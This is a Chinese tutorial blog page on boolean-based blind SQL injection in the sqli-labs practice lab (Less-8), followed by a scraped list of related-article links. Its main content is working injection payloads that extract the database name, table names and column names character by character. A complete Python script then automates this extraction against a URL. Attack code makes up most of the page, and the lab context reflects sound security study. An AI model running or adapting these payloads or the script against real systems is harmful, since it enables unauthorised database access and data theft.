reject404
reject404

sqli-labs-master(盲注脚本自动获取数据)

盲注

盲注顾名思义,只会返回True或者False,需要一个一个字符地去拆解表中内容,步骤相对联合注入比较繁琐,但找到规律也是很好理解的。

盲注需要理解掌握的几个函数是ord(),ascii(),substr();具体在下文payload中自行理解。

一、获取数据库长度
用到database(),length()函数,得到数据库长度为8

#payload
?id=1' and length(database())=8 --+

成功返回,所以数据库名长度是8,其实根据这个思路可以很好地写出相应地攻击脚本。
sqli-labs-master(盲注脚本自动获取数据)_第1张图片
二、获取数据库名
可以用substr(),ascii(),ord()函数,看自己喜欢,客人喜欢用前二。下面看到逐步拆解出数据库名为security

#payload,substr()函数
?id=1' and substr(database(),1,1)='s' --+
?id=1' and substr(database(),2,1)='e' --+
?id=1' and substr(database(),3,1)='c' --+
?id=1' and substr(database(),4,1)='u' --+
?id=1' and substr(database(),5,1)='r' --+
?id=1' and substr(database(),6,1)='i' --+
?id=1' and substr(database(),7,1)='t' --+
?id=1' and substr(database(),8,1)='y' --+

#也可以substr()与ascii()结合使用,115为s的ascii码值
?id=1' and ascii(substr(database(),1,1))=115 --+

图片不一一示例了。
sqli-labs-master(盲注脚本自动获取数据)_第2张图片
sqli-labs-master(盲注脚本自动获取数据)_第3张图片
sqli-labs-master(盲注脚本自动获取数据)_第4张图片

三、获取表数量
用到count()函数,得到总共有4个表

#payload,得出表数量为四个
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+

sqli-labs-master(盲注脚本自动获取数据)_第5张图片
五、获取表长度
用到length()函数与limit函数控制输出,分别得出四个表依序长度为6,8,7,5

#payload
#输出第一个表的长度limit 0,1
?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6 --+
#输出第二个表的长度limit 1,1
?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8 --+
#输出第三个表的长度limit 2,1
?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 2,1)=7 --+
#输出第四个表的长度limit 3,1
?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 2,1)=5 --+

sqli-labs-master(盲注脚本自动获取数据)_第6张图片
六、获取表名
得出数量与长度,逐步拆解出四个表分别为emails、referers、uagents、users,这里只举例第一个表,一样是用substr函数或者ascii()函数拆解得到表名。

#payload,获取第一个表名
#拆解第一个表名的第一个字母
?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+
#拆解第一个表名的第二个字母
?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1)='m' --+
#拆解第一个表名的第三个字母
?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),3,1)='a' --+
#拆解第一个表名的第四个字母
?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),4,1)='i' --+
#拆解第一个表名的第五个字母
?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),5,1)='l' --+
#拆解第一个表名的第六个字母
?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),6,1)='s' --+

sqli-labs-master(盲注脚本自动获取数据)_第7张图片
sqli-labs-master(盲注脚本自动获取数据)_第8张图片

七、同样获取段数量、长度、段名
依照获取表的方式照搬,可以得出表内的段名,这里不多示例。第一个表emails有两个字段:id、email_id

#获取段数量
?id=1' and (select count(column_name) from information_schema.columns where table_name='emails')=2 --+
#获取第一、二个段名长度
?id=1' and (select length(column_name) from information_schema.columns where table_name='emails' limit 0,1)=2 --+
?id=1' and (select length(column_name) from information_schema.columns where table_name='emails' limit 1,1)=8 --+
#获取emails表中第一个段名:id
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),2,1)='d' --+
#获取emails表中第二个段名:email_id
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1)='e' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),2,1)='m' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),3,1)='a' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),4,1)='i' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),5,1)='l' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),6,1)='_' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),7,1)='i' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),8,1)='d' --+

一些截图:
sqli-labs-master(盲注脚本自动获取数据)_第9张图片
sqli-labs-master(盲注脚本自动获取数据)_第10张图片
sqli-labs-master(盲注脚本自动获取数据)_第11张图片
sqli-labs-master(盲注脚本自动获取数据)_第12张图片

下面是我用python写的脚本,进行自动化爆破:

#-*-coding:utf-8-*-
#python3
import requests
import re
import datetime

'''Get database length'''
def get_database_length(target_url):
    print('Loading...')
    for i in range(1,50):
        payload = "?id=1' and (select length(database())=%s) --+"%i
        htmlcontent = requests.get(target_url + payload).text
        result = re.findall("You are in...........",htmlcontent)
        if not result:
            continue
        else:
            print('Database length: %s' %i)
            return i

'''Get database name'''
def get_database_name(target_url):
    db_name = ''
    db_length = get_database_length(target_url)
    letters = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    for i in range(1,db_length + 1):
        for letter in letters:
            payload = "?id=1' and substr(database(),%s,1)='%s' --+" %(i, letter)
            htmlcontent = requests.get(target_url + payload).text
            result = re.findall("You are in...........",htmlcontent)
            if not result:
                continue
            else:
                db_name += letter
    print('Database name:%s'%db_name)
    return db_name


'''Get table count'''
def get_table_count(target_url,database):
    for i in range(20):
        payload = "?id=1' and (select count(table_name) from information_schema.tables where table_schema = '%s') = %s --+"%(database,i)
        htmlcontent = requests.get(target_url + payload).text
        result = re.findall("You are in...........",htmlcontent)
        if not result:
            continue
        else:
            return i


'''Get table length'''
# num 为第几个表
def get_table_length(target_url,num,database):
    for i in range(50):
        payload = "?id=1' and (select length(table_name) from information_schema.tables where table_schema ='"+database+"'limit %s,1)=%s --+"%(num,i)
        htmlcontent = requests.get(target_url + payload).text
        result = re.findall("You are in...........",htmlcontent)
        if not result:
            continue
        else:
            return i


'''Get table name'''
def get_table_name(target_url,database):
    table_name = []
    letters = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    table_count = get_table_count(target_url,database)
    for i in range(0,table_count+1):
        name = ''
        table_length = get_table_length(target_url,i,database)
        if table_length == None:
            break
        for j in range(1,table_length+1):
            for letter in letters:
                payload = "?id=1' and substr((select table_name from information_schema.tables where table_schema='"+database+"' limit %s,1),%s,1)='%s' --+"%(i,j,letter)
                htmlcontent = requests.get(target_url + payload).text
                result = re.findall("You are in...........", htmlcontent)
                if not result:
                    continue
                else:
                    name += letter
        table_name.append(name)
    return table_name


'''Get column count'''
def get_column_count(target_url,table_name):
    for i in range(20):
        payload = "?id=1' and (select count(column_name) from information_schema.columns where table_name='"+table_name+"') = %s --+" %i
        htmlcontent = requests.get(target_url + payload).text
        result = re.findall("You are in...........", htmlcontent)
        if not result:
            continue
        else:
            print('column count:%s'%i)
            return i


'''Get column length'''
def get_column_length(target_url,table_name,num):
    for i in range(1,50):
        payload = "?id=1' and (select length(column_name) from information_schema.columns where table_name='"+table_name+"'limit %s,1)=%s --+"%(num,i)
        htmlcontent = requests.get(target_url + payload).text
        result = re.findall("You are in...........", htmlcontent)
        if not result:
            continue
        else:
            #print('column length:%s'%i)
            return i


'''Get column name'''
def get_column_name(target_url,table_name):
    column_name = []
    letters = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    column_count = get_column_count(target_url, table_name)
    for i in range(0, column_count + 1):
        name = ''
        column_length = get_column_length(target_url, table_name, i)
        if column_length == None:
            # print('can not get column length.')
            break
        for j in range(1, column_length + 1):
            for letter in letters:
                payload = "?id=1' and substr((select column_name from information_schema.columns where table_name='"+table_name+"' "+\
                          "limit %s,1),%s,1)='%s' --+" %(i, j, letter)
                htmlcontent = requests.get(target_url + payload).text
                result = re.findall("You are in...........", htmlcontent)
                if not result:
                    continue
                else:
                    name += letter
        column_name.append(name)
    return column_name



if __name__ == '__main__':
    print('+---------------------------------------------------------------------------------------------+')
    begin = datetime.datetime.now()
    target_url = 'http://127.0.0.1/sqli-labs-master/Less-8/'
    database = get_database_name(target_url)
    print(database + 'have these tables:%s'%get_table_name(target_url,database))
    table_name = 'emails'
    print('emails have these columns %s'%get_column_name(target_url,table_name))
    end = datetime.datetime.now()
    spent = (end - begin).seconds
    print('All cost %s seconds' %spent)
    print('+---------------------------------------------------------------------------------------------+')

运行效果:
sqli-labs-master(盲注脚本自动获取数据)_第13张图片

你可能感兴趣的:(sqli-lab)

  • sqli-lab之第二章--盲注 江南小虫虫
    第二章盲注注意:本文大部分内容都是参考mysql注入天书学习篇何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面.此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注,这种情况下往往需要一个一个字符的去猜解,需要用到截取字符串.0x01基于布尔SQL盲注我们可以利用逻辑判断进行盲注,而布尔注入能够利用的根本就是,我们能够看到true和false返回
  • 05_SQL注入_功能语句&报错注入&盲注 路人harutoo Web安全实战记录sqlweb安全网络安全安全性测试安全
    05_SQL注入_功能语句&报错回显&盲注1.SQL语句和网站功能1.1Web开发中常见语句【本章代码来源于pikachu和sqli-lab中的靶场】开发中,根据不同的需求,开发者会采用不同SQL语句与数据库进行交互,渗透测试人员在采用黑盒测试的情况下,根据不同的功能猜测对应语句进行注入是一项必备能力。1.select查询语句select往往用于网站需要显示查询的操作,考虑如下代码,'name’可
  • SQL注入学习(配合SQLi-lab靶场) 就不做程序猿 sql学习数据库
    前提条件:在进行sql注入时,首先要确定网页有注入点,一般在URL地址栏中,或者含有输入框的地方会有SQL注入步骤:1、判断注入类型首先判断是什么类型的注入,用id=1and1=1和id=1and1=2判断是数字类型注入还是字符型注入如果二者都能进行正常显示界面,则为字符型注入,否则是数字型注入(小技巧:可以用id=2-1判断,如果页面显示的和id=1相同则为数字型注入,如果和id=2相同,则为字
  • Sqli_labs通关全解--总结 辰霖心 sql-labssql数据库mysql
    本篇文章,为小编完成Sqli--labs所有关卡实验的总结文章,总结了,sql注入的基本方式,下文中所提到的所有注入分类和注入方法基本都在sqli-labs中有所体现,几乎每一关都可以将其总结到本文的某一种分类中,可以参照本文对sqli-lab实验进行尝试,具体每一关的操作,会在后续的文章中介绍什么是SQLI所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通
  • SQLI-lab通关(1) 丞星星祺气球 安全数据库sqlweb安全
    首先就是安装靶场环境,这个步骤很简单装过环境的同学肯定不陌生,phpstudy环境,然后sqli-lab搭建就可以了,在这里就不赘述,大家自行百度吧。首先第一关看到一个网站如何来验证他有没有注入漏洞,很简单利用'and1=2这个语句来判断。为什么呢?很简单,SQL注入漏洞的原理就是没有对用户输入的内容进行严格的过滤和筛选导致把用户输入的内容当做是SQL语句的一部分执行,从而导致数据库被破坏,那么来
  • Sqli-lab教程-史上最全详解(1-22通关) Ant-ww sql注入sqli-lab-masterweb安全sql安全数据库
    目录Less-1联合注入Less-2Less-3Less-4Less-5报错注入/布尔盲注/时间盲注Less-6报错注入/布尔盲注/时间盲注Less-7文件导出Less-8布尔盲注/时间盲注Less-9时间盲注Less-10时间盲注Less-11post注入Less-12post注入Less-13post盲注Less-14post盲注Less-15时间盲注Less-16时间盲注Less-17修改密
  • Sqli-lab注入靶场 1-10笔记 嗷呜一口大桃子 安全sqlphp
    目录通关大致思路:Less1GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)Less-2GET-Errorbased-Intigerbased(基于错误的GET整型注入)Less-3GET-Errorbased-Singlequoteswithtwiststring(基于错误的GET单引号变形字符型注入)Less-4GET-Errorbase
  • sqli-lab 1-16通关随笔记 qianpd web安全web安全安全php
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档SQL注入学习sqli-labs靶场通关1~16前段时间大概学了一遍内网,免杀正好来将web这块重新复习一遍由于是直接刷关所以只是让关卡报出注入点其余的都没搞。首先明确SQL注入产生的原理是传递结构化语言时影响了数据库的执行叫做SQL注入。GET注入1~4关这些关卡都是统一的get型注入而且都是通过联合查询的$sql="SELECT*
  • sqli-lab靶场通关 PT_silver 渗透测试实践安全
    文章目录less-1less-2less-3less-4less-5less-6less-7less-8less-9less-10less-11、提示输入参数id,且值为数字;2、判断是否存在注入点id=1'报错,说明存在SQL注入漏洞。3、判断字符型还是数字型id=1and1=1--+id=1and1=2--+id=1"--+注意,注释#可能没有--+好使两次页面返回均正常,说明为字符型注入。下
  • 定制SQLmap和WAF绕过 网安咸鱼1517 网络安全安全系统安全web安全安全架构WAFtamper
    1.SQLmaptamper脚本编写以sqli-lab第26关为例输入?id=1’--+,报错字符型注入考虑闭合问题,输入?id=1’and'1,但是回显中and和空格消失了,可知and和空格被过滤了因为and和or被过滤考虑使用双写绕过手段,空格使用其他字符进行代替例如%0a或%a0SQL注入常见绕过技巧使用SQLmap扫描,结果无SQL注入漏洞可是明明手动测试存在SQL注入漏洞但是SQLmap
  • Sqli-Lab实验环境搭建 灭霸_
    介绍:Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程。也是我们用来练习sql注入的一个很好的实验平台。搭建:因为Sqli-labs需要PHP+APACHE+MYSQL环境所以需要下载phpstudy或者XAMPP此类环境下载:下载地址:https://github.com/Audi-1/sqli-labs将下载的SQLi-Labs.zip解压到phpstudy网站根目录下
  • SQLi-LAB lesson4 Error based解析 gg大宇
    image.png单引号测试无反应image.png双引号报错:image.png添加一层括号还是会报错image.png单引号添加就不会报错image.png推测是双引号包含传参,因为双引号是可以包含单引号的。查看源代码发现id.'"';id)limit0,1";所以说添加?id=1')时,传递的语句是("1')")所以没有报错而传递双引号得话,就存在闭合问题了。提一嘴,这里没有infromat
  • 小菜鸡的学习笔记——sql注入之sqli-lab边学边练 玛卡_八嘎 个人笔记web安全安全网络sql网络安全
    结合sqli-lab靶场的sql注入学习笔记第一关Way1:字符型联合注入Way2:报错型注入第二关:get数值型联合注入第三关:字符型闭合注入第四关:字符型闭合注入第五关:报错注入第六关:字符型报错注入第七关:导出文件GET字符型注入第八关:布尔型盲注第九关:单引号时间型注入第一关Way1:字符型联合注入测试语句id=1and1=1/1=2页面无区别说明不是数字型注入尝试字符型注入,因为我们猜测
  • sqli-lab刷题Less-6 基于盲注的双引号型sql注入 fippyFish sqli-lab刷题sqlless
    sqli-lab刷题Less-6基于盲注的双引号型sql注入输入?id=1\,报出错误猜测其原语句为"$id"LIMIT0,1输入?id=1"--+发现其不报错,说明猜测正确输入?id=1"orderby3--+,不报错,输入?id=1"orderby4--+,报错由此可以知道只有三个字段输入?id=1"and1=2unionselect1,2,3--+,发现其不回显,说明为盲注盲注具体看这篇文章
  • SQL注入实操(Less1-20) wutiangui sqloracle数据库
    文章目录一、sqli-lab靶场搭建二、通关笔记1.Less-1a.单引号‘b.updatexmlc.concatd.unione.information_schemaf.GROUP_CONCATg.select1,22.Less-23.Less-3a.怎么找到注入点b.判断SQL注入漏洞的类型c.闭合语句d.如何判断显示位e.答案4.Less-45.Less-5a.判断注入漏洞的依据b.bool
  • SQL注入实操二 wutiangui sql数据库服务器
    文章目录一、sqli-lab靶场1.轮子模式总结2.Less-21a.注入点判断b.轮子测试c.获取数据库名称d.获取表信息e.获取列信息f.获取表内数据3.Less-22a.注入点判断b.轮子测试c.获取数据库名称d.获取表信息e.获取列信息f.获取表内数据4.Less-23a.注入点判断b.轮子测试c.获取数据库名称d.获取表信息e.获取列信息f.获取表内数据5.Less-24a.创建特殊用户
  • sqli-lab之第零章--环境搭建 江南小虫虫
    第零章环境搭建前言本系列教程的试验靶场为sqli-labs,该靶场的下载地址为https://github.com/Audi-1/sqli-labs,可以自行去下载,而装了git的童鞋也可以直接用下面的命令clone到随意的目录gitclonehttps://github.com/Audi-1/sqli-labs因为写这个靶场的印度程序猿当年的php的版本小于7,用的是类似于mysql_的语句,而
  • Sqlmap在sqli-lab上的一些使用 不知道叫啥的喵 笔记
    目录1.get使用方法:2.post使用方法:3.header注入使用方法:4.指定注入的位置:5.盲注使用不接收httpbody:6.设置多线程(可以设置的最大数量为10,默认为1):7.预测输出:8.持久连接:9.指定数据库的探测10.sqlmap脚本绕过(详细的脚本解释)11.强制设置无效值替换:12.自定义载荷(payload)位置13.sqlmay设置tamper脚本:14.sqlmap
  • sqlmap使用(以sqli-lab为例) dafeng2773 数据库
    1.get使用方法:(Less-1**ErrorBased-String**)1.查看是否有注入点:sqlmap-u网址2.爆出数据库名:sqlmap-u网址--dbs3.爆出数据库表名sqlmap-u网址-D'security'--tables4.爆出指定表的列名:sqlmap-u网址-D'security'-T'users'--columns5.dump出数据:sqlmap-u-Dsecuri
  • phpstudy 搭建 sqli-labs SQL 注入靶场 两个月亮 Tool安全sqlgitgithub
    phpstudy搭建sqli-labsSQL注入靶场所需工具获取项目文件WarnningResolve1.使用默认区分大小写的操作系统2.使用PowserShell启用目录的区分大小写属性3.修改Git配置属性使其区分大小写(鸡肋)使用PHP集成开发环境phpstudy搭建sqli-lab靶场前情开启Apache服务设置网站根目录访问sqli-labs后续工作为sqli-labs配置数据库的相关信
  • sqli-lab之第一章--基础知识 江南小虫虫
    第一章基础知识在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。本章将介绍一些mysql注入的一些基础知识,可能知识有点多,希望大家认真看一遍,实操一遍.学习篇0x01注入的分类下面这个是阿德玛表哥的总结的,现在理解不了可以跳过0x
  • sqli-lab教程——Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入) luosaierdadi 大数据数据库sql
    双引号字符型注入,上一题的单引号改成双引号就可以了,同样是两种方法:时间延迟型的手工盲注、报错型的手工盲注或者sqlmap,再有利用concat()几聚合数。步骤和第五题一样。
  • sqli-lab简单python实现通关 williuLI python数据库sql安全漏洞安全
    刚开始学习sql注入的菜鸟,简单写下自己的理解,sql注入,肯定和数据库有关系了。利用sql语句来实现对数据库的入侵并获取数据或者破坏。简单来说就是,利用sql语句来实现欺骗服务器,达到自己的目的。比如:我们要登录,需要输入用户名个和密码,然后后台数据库就会selectSELECT*FROMusersWHEREusername='张三'ANDpassword='123456'然后我们改变他的查询方
  • 使用docker搭建sqli-lab环境以及upload-labs环境 xss挑战之旅环境 搭建vulhub环境 记录笔记 dockerxss
    sqli-lab环境1)查找sqli-lab环境dockersearchsqli-labs2)拉取镜像dockerpullacgpiano/sqli-labs3)dockerrun-dt--namesqli-p80:80--rmacgpiano/sqli-labsupload-labs环境)查找镜像dockersearchupload-labsxss挑战之旅环境拉取镜像dockersearchxs
  • docker的基本操作 一颗努力的小白菜 docker
    1、docker的基本操作更新安装docker验证doker是否安装成功使用docker,从docker镜像仓库下载镜像。查看镜像启动镜像:dockerrun-d-p81:80查看进程:dockerps进入容器:2、使用docker搭建sqli-lab环境以及upload-labs环境,操作步骤配截图。(1)搭建sqli-lib查找sqli-lab环境:dockersearchsqli-labs拉
  • 使用宝塔搭建网站(注入靶场sqli-lab) MR.QQQQIU 新手注入linux安全
    使用宝塔搭建靶场网站需要的软件查询自己的ip地址并连接打开宝塔面板并登录上传站点目录(上传靶场文件)修改根目录的文件试着打开站点需要的软件虚拟机,装好centos7的镜像开机并登录自己的账号密码查询自己的ip地址并连接使用命令ipaddr上面打码的就是我们的账号密码了然后我们打开cmd命令行使用[email protected]然后回车xxx.xxx.xxx.xxx代表我们的IP号,也
  • sqli-labs sql注入漏洞学习平台 靶场 安装 和小技巧 营长s sqli-labs数据库mysql
    小技巧在文章最后页面显示sql语句方便学习sqli-lab下载地址:https://github.com/Audi-1/sqli-labsweb环境搭建:在安装靶场之前,我们还需要搭建web运行环境:这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:下载地址下载后安装即可!!注意:不要安装最新版phpstudy,与sqli-l
  • 什么,有狗快跑!慢着,这次手把手教你怎么过安全狗!(sql注入篇) 随风kali
    前言在记忆里上次绕安全狗还是在上次,开开心心把自己之前绕过狗的payload拿出来,发现全部被拦截了,事情一下子就严肃起来了,这就开整。环境本次环境如下sqli-lab的sql注入靶场网站安全狗APACHE版V4.0版本的最高防护等级绕过方法首先先来分析分析以前以前绕过的Payload-1'union/*!10440*/select1,2,3--+其中这里的10440数字经过fuzz可以替换的有如
  • sqli-lab————Writeup(18~20)各种头部注入 b1gpig sql安全
    less18基于错误的用户代理,头部POST注入adminadmin登入成功(进不去重置数据库)显示如下有useragent参数,可能存在注入点显示版本号:爆库:User-Agent:'andextractvalue(1,concat(0x7e,(selectdatabase()),0x7e))and'库名:less19基于头部的RefererPOST报错注入抓包admin登陆什么也没有在refe
  • 2019-07-15 c7188eaf395a
    第三天一、Sqli-lab(1)4查询报错,所以有3条字段localhost/sqli-labs-master/Less-1/?id=1'orderby1%23localhost/sqli-labs-master/Less-1/?id=1'orderby2%23localhost/sqli-labs-master/Less-1/?id=1'orderby3%23localhost/sqli-lab
  • java责任链模式 3213213333332132 java责任链模式村民告县长
    责任链模式,通常就是一个请求从最低级开始往上层层的请求,当在某一层满足条件时,请求将被处理,当请求到最高层仍未满足时,则请求不会被处理。 就是一个请求在这个链条的责任范围内,会被相应的处理,如果超出链条的责任范围外,请求不会被相应的处理。 下面代码模拟这样的效果: 创建一个政府抽象类,方便所有的具体政府部门继承它。 package 责任链模式; /** *
  • linux、mysql、nginx、tomcat 性能参数优化 ronin47
    一、linux 系统内核参数 /etc/sysctl.conf文件常用参数 net.core.netdev_max_backlog = 32768 #允许送到队列的数据包的最大数目 net.core.rmem_max = 8388608 #SOCKET读缓存区大小 net.core.wmem_max = 8388608 #SOCKET写缓存区大
  • php命令行界面 dcj3sjt126com PHPcli
    常用选项 php -v php -i PHP安装的有关信息 php -h 访问帮助文件 php -m 列出编译到当前PHP安装的所有模块 执行一段代码 php -r 'echo "hello, world!";' php -r 'echo "Hello, World!\n";' php -r '$ts = filemtime("
  • Filter&Session 171815164 session
    Filter HttpServletRequest requ = (HttpServletRequest) req; HttpSession session = requ.getSession(); if (session.getAttribute("admin") == null) { PrintWriter out = res.ge
  • 连接池与Spring,Hibernate结合 g21121 Hibernate
            前几篇关于Java连接池的介绍都是基于Java应用的,而我们常用的场景是与Spring和ORM框架结合,下面就利用实例学习一下这方面的配置。         1.下载相关内容:     &nb
  • [简单]mybatis判断数字类型 53873039oycg mybatis
           昨天同事反馈mybatis保存不了int类型的属性,一直报错,错误信息如下:       Caused by: java.lang.NumberFormatException: For input string: "null" at sun.mis
  • 项目启动时或者启动后ava.lang.OutOfMemoryError: PermGen space 程序员是怎么炼成的 eclipsejvmtomcatcatalina.sheclipse.ini
       在启动比较大的项目时,因为存在大量的jsp页面,所以在编译的时候会生成很多的.class文件,.class文件是都会被加载到jvm的方法区中,如果要加载的class文件很多,就会出现方法区溢出异常 java.lang.OutOfMemoryError: PermGen space.     解决办法是点击eclipse里的tomcat,在
  • 我的crm小结 aijuans crm
    各种原因吧,crm今天才完了。主要是接触了几个新技术: Struts2、poi、ibatis这几个都是以前的项目中用过的。 Jsf、tapestry是这次新接触的,都是界面层的框架,用起来也不难。思路和struts不太一样,传说比较简单方便。不过个人感觉还是struts用着顺手啊,当然springmvc也很顺手,不知道是因为习惯还是什么。jsf和tapestry应用的时候需要知道他们的标签、主
  • spring里配置使用hibernate的二级缓存几步 antonyup_2006 javaspringHibernatexmlcache
    .在spring的配置文件中 applicationContent.xml,hibernate部分加入 xml 代码 <prop key="hibernate.cache.provider_class">org.hibernate.cache.EhCacheProvider</prop> <prop key="hi
  • JAVA基础面试题 百合不是茶 抽象实现接口String类接口继承抽象类继承实体类自定义异常
    /*   * 栈(stack):主要保存基本类型(或者叫内置类型)(char、byte、short、   *int、long、 float、double、boolean)和对象的引用,数据可以共享,速度仅次于   * 寄存器(register),快于堆。堆(heap):用于存储对象。   */  &
  • 让sqlmap文件 "继承" 起来 bijian1013 javaibatissqlmap
            多个项目中使用ibatis , 和数据库表对应的 sqlmap文件(增删改查等基本语句),dao, pojo 都是由工具自动生成的, 现在将这些自动生成的文件放在一个单独的工程中,其它项目工程中通过jar包来引用 ,并通过"继承"为基础的sqlmap文件,dao,pojo 添加新的方法来满足项
  • 精通Oracle10编程SQL(13)开发触发器 bijian1013 oracle数据库plsql
    /* *开发触发器 */ --得到日期是周几 select to_char(sysdate+4,'DY','nls_date_language=AMERICAN') from dual; select to_char(sysdate,'DY','nls_date_language=AMERICAN') from dual; --建立BEFORE语句触发器 CREATE O
  • 【EhCache三】EhCache查询 bit1129 ehcache
    本文介绍EhCache查询缓存中数据,EhCache提供了类似Hibernate的查询API,可以按照给定的条件进行查询。   要对EhCache进行查询,需要在ehcache.xml中设定要查询的属性   数据准备 @Before public void setUp() { //加载EhCache配置文件 Inpu
  • CXF框架入门实例 白糖_ springWeb框架webserviceservlet
    CXF是apache旗下的开源框架,由Celtix + XFire这两门经典的框架合成,是一套非常流行的web service框架。 它提供了JAX-WS的全面支持,并且可以根据实际项目的需要,采用代码优先(Code First)或者 WSDL 优先(WSDL First)来轻松地实现 Web Services 的发布和使用,同时它能与spring进行完美结合。 在apache cxf官网提供
  • angular.equals boyitech AngularJSAngularJS APIAnguarJS 中文APIangular.equals
    angular.equals   描述: 比较两个值或者两个对象是不是 相等。还支持值的类型,正则表达式和数组的比较。   两个值或对象被认为是 相等的前提条件是以下的情况至少能满足一项: 两个值或者对象能通过=== (恒等) 的比较 两个值或者对象是同样类型,并且他们的属性都能通过angular
  • java-腾讯暑期实习生-输入一个数组A[1,2,...n],求输入B,使得数组B中的第i个数字B[i]=A[0]*A[1]*...*A[i-1]*A[i+1] bylijinnan java
    这道题的具体思路请参看 何海涛的微博:http://weibo.com/zhedahht import java.math.BigInteger; import java.util.Arrays; public class CreateBFromATencent { /** * 题目:输入一个数组A[1,2,...n],求输入B,使得数组B中的第i个数字B[i]=A
  • FastDFS 的安装和配置 修订版 Chen.H linuxfastDFS分布式文件系统
    FastDFS Home:http://code.google.com/p/fastdfs/ 1. 安装 http://code.google.com/p/fastdfs/wiki/Setup http://hi.baidu.com/leolance/blog/item/3c273327978ae55f93580703.html 安装libevent (对libevent的版本要求为1.4.
  • [强人工智能]拓扑扫描与自适应构造器 comsci 人工智能
          当我们面对一个有限拓扑网络的时候,在对已知的拓扑结构进行分析之后,发现在连通点之后,还存在若干个子网络,且这些网络的结构是未知的,数据库中并未存在这些网络的拓扑结构数据....这个时候,我们该怎么办呢?       那么,现在我们必须设计新的模块和代码包来处理上面的问题
  • oracle merge into的用法 daizj oraclesqlmerget into
    Oracle中merge into的使用 http://blog.csdn.net/yuzhic/article/details/1896878 http://blog.csdn.net/macle2010/article/details/5980965 该命令使用一条语句从一个或者多个数据源中完成对表的更新和插入数据. ORACLE 9i 中,使用此命令必须同时指定UPDATE 和INSE
  • 不适合使用Hadoop的场景 datamachine hadoop
    转自:http://dev.yesky.com/296/35381296.shtml。   Hadoop通常被认定是能够帮助你解决所有问题的唯一方案。 当人们提到“大数据”或是“数据分析”等相关问题的时候,会听到脱口而出的回答:Hadoop!  实际上Hadoop被设计和建造出来,是用来解决一系列特定问题的。对某些问题来说,Hadoop至多算是一个不好的选择,对另一些问题来说,选择Ha
  • YII findAll的用法 dcj3sjt126com yii
    看文档比较糊涂,其实挺简单的: $predictions=Prediction::model()->findAll("uid=:uid",array(":uid"=>10));   第一个参数是选择条件:”uid=10″。其中:uid是一个占位符,在后面的array(“:uid”=>10)对齐进行了赋值; 更完善的查询需要
  • vim 常用 NERDTree 快捷键 dcj3sjt126com vim
    下面给大家整理了一些vim NERDTree的常用快捷键了,这里几乎包括了所有的快捷键了,希望文章对各位会带来帮助。 切换工作台和目录 ctrl + w + h 光标 focus 左侧树形目录ctrl + w + l 光标 focus 右侧文件显示窗口ctrl + w + w 光标自动在左右侧窗口切换ctrl + w + r 移动当前窗口的布局位置 o 在已有窗口中打开文件、目录或书签,并跳
  • Java把目录下的文件打印出来 蕃薯耀 列出目录下的文件文件夹下面的文件目录下的文件
    Java把目录下的文件打印出来 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 11:02:
  • linux远程桌面----VNCServer与rdesktop hanqunfeng Desktop
    windows远程桌面到linux,需要在linux上安装vncserver,并开启vnc服务,同时需要在windows下使用vnc-viewer访问Linux。vncserver同时支持linux远程桌面到linux。   linux远程桌面到windows,需要在linux上安装rdesktop,同时开启windows的远程桌面访问。   下面分别介绍,以windo
  • guava中的join和split功能 jackyrong java
    guava库中,包含了很好的join和split的功能,例子如下: 1) 将LIST转换为使用字符串连接的字符串    List<String> names = Lists.newArrayList("John", "Jane", "Adam", "Tom");
  • Web开发技术十年发展历程 lampcy androidWeb浏览器html5
    回顾web开发技术这十年发展历程: Ajax 03年的时候我上六年级,那时候网吧刚在小县城的角落萌生。传奇,大话西游第一代网游一时风靡。我抱着试一试的心态给了网吧老板两块钱想申请个号玩玩,然后接下来的一个小时我一直在,注,册,账,号。 彼时网吧用的512k的带宽,注册的时候,填了一堆信息,提交,页面跳转,嘣,”您填写的信息有误,请重填”。然后跳转回注册页面,以此循环。我现在时常想,如果当时a
  • 架构师之mima-----------------mina的非NIO控制IOBuffer(说得比较好) nannan408 buffer
